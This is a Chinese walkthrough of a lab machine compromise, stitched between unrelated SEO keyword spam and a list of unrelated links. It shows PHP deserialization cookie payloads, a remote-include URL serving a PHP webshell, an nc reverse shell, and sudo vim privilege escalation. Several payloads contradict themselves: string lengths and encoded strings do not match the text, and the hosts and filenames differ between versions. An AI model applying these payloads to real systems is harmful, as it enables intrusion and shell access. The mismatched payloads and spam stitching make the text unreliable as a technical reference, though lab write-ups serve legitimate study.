当前位置: 首页 > news >正文

随州程力网站建设清华大学绿色大学建设网站

随州程力网站建设,清华大学绿色大学建设网站,iis7.5搭建网站,今题网免费发布信息网目录 一、信息收集 1.探测主机存活(目标主机IP地址) 2.访问web服务 3.后台目录和端口扫描 4.解析bak.zip源码 二、漏洞利用 1.构造payload 2.通过bp的repeater模块 3.get shell 4.获取反弹shell 三、提升权限 1. 查看系统版本,内核…

目录

一、信息收集

1.探测主机存活(目标主机IP地址)

2.访问web服务

3.后台目录和端口扫描

4.解析bak.zip源码

二、漏洞利用

1.构造payload

2.通过bp的repeater模块

3.get shell

4.获取反弹shell

三、提升权限

1. 查看系统版本,内核版本。

2. 查看根目录发现存在敏感文件credentials.txt.bak。

3.打开查看是用户名和密码,SSH登录。

4.刚才查看了版本,暂时找不到可提权的漏洞,那么,我们尝试找一下当前用户可执行与无法执行的指令,可以看到vim编辑器对所有用户NOPASSWD。

5.尝试提权,试试sudo vim,进入到命令模式输入!bash。

6.提权成功


一、信息收集

1.探测主机存活(目标主机IP地址)

2.访问web服务

1.首先访问80端口,页面只有一行文本:Hello sk4This is a beta test for new cookie handler,在首页中并未有任何有价值的信息

3.后台目录和端口扫描

开启80和22端口说明可能用到远程连接。

经过扫描后我们我们尝试访问扫描结果对应的目录,结果发现在/backup目录下存在压缩包

4.解析bak.zip源码

下载解压后,存有三个php文件

整理思路: 首次访问网站后,后台会创建一个user对象,并且内部又为wel变量创建welcome对象,同时进行序列化base64编码存入cookie,我们抓一下页面的包,发现cookie。

这里的cookie便是后台通过base64编码后的结果

使用base64解码后得到的结果

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}7

二、漏洞利用

1.构造payload

由于空格在url地址中无法识别,所以将所有空格转为8进制\x00 同时由于文件包含参数为type_log,所以内容应为文件路径

O:4:“User”:2:{s:10:“\x00User\x00name”;s:3:“sk4”;s:9:“\x00User\x00wel”;O:3:“Log”:1:{s:8:“type_log”;s:11:“/etc/passwd”}}

编码后的payload如下:

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==

2.通过bp的repeater模块

成功访问到信息,可以看到sk4用户属性为/bin/bash

3.get shell

1.构造序列化语句上传shell

<?php @system($_GET['cmd']);?>

2.然后构造payload:

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:26:"http://本地IP/c.txt";}}

然后进行序列化和base64编码执行。代码如下:

<?phpclass Log {private $type_log = "http://192.168.3.222/c.txt";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

64编码后的payload:

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjU6Imh0dHA6Ly8xOTIuMTY4LjU2LjEvc2hlbGwudHh0Ijt9fQ==

3.用burpsuite上传

成功执行一句话木马

4.获取反弹shell

直接使用nc工具来尝试回弹一个shell

在kali中使用nc监听7777端口等待靶机访问

成功回弹!!

三、提升权限

1. 查看系统版本,内核版本。

2. 查看根目录发现存在敏感文件credentials.txt.bak。

3.打开查看是用户名和密码,SSH登录。

4.刚才查看了版本,暂时找不到可提权的漏洞,那么,我们尝试找一下当前用户可执行与无法执行的指令,可以看到vim编辑器对所有用户NOPASSWD。

5.尝试提权,试试sudo vim,进入到命令模式输入!bash。

6.提权成功

http://www.yayakq.cn/news/250283/

相关文章:

  • 2016广州网站设计公司快速搭建论坛
  • 万州做网站aardio 网站开发
  • 外国人做那个视频网站吗企业解决单身问题方案
  • 做我的世界缩略图的网站有做喜糖的网站吗
  • 网站开发项目报告书学设计哪个职业学校比较好
  • 做推广网站的去哪能买到有效资料上海浦东注册公司
  • 网站的二级栏目怎么做wordpress手机端显示分类
  • 网站简繁体转换.rar百度一下你就知道主页
  • 电器网站建设目的欧美网站建设教程
  • 网站建设软件免费网站推广软件有哪些
  • 怎样上网站建设电子商务网络营销是什么
  • 举报网站建设建一个在线商城网站
  • 湛江建站模板外包做网站平台 一分钟
  • 建设银行官方网站登录网络推广企业
  • 大连建网站多少钱wordpress 模板 免费
  • html5个人主页制作代码四川游戏seo整站优化
  • 电子商务网站建设与管理 项目任务 教材笔记本怎么做1920宽的网站
  • 如何判断一个网站的关键词是否难做免费企业建网站
  • 门店做网站有没有必要wordpress 仪表盘裁剪图片
  • 福建省建设注册执业管理中心网站wordpress typecho 大数据库
  • 网站建设进度图wordpress 设置分页显示条数
  • 网站开发需要用例图吗龙华做网站哪家好
  • 外贸网站推广渠道设计制作一个 个人主页网站
  • 求几个夸克没封的a站2023小程序店铺装修教程
  • 做网站珊瑚橙颜色怎么搭配好看淘宝官网首页入口电脑版
  • 网站程序指的是什么修改wordpress
  • 网站建设与维护实训总结wordpress 添加面包屑
  • 网站怎么防黑客asp网站空间
  • 金融行业高端网站制作服装网站建设策划
  • 网站开发好就业吗怎样做公司网站推广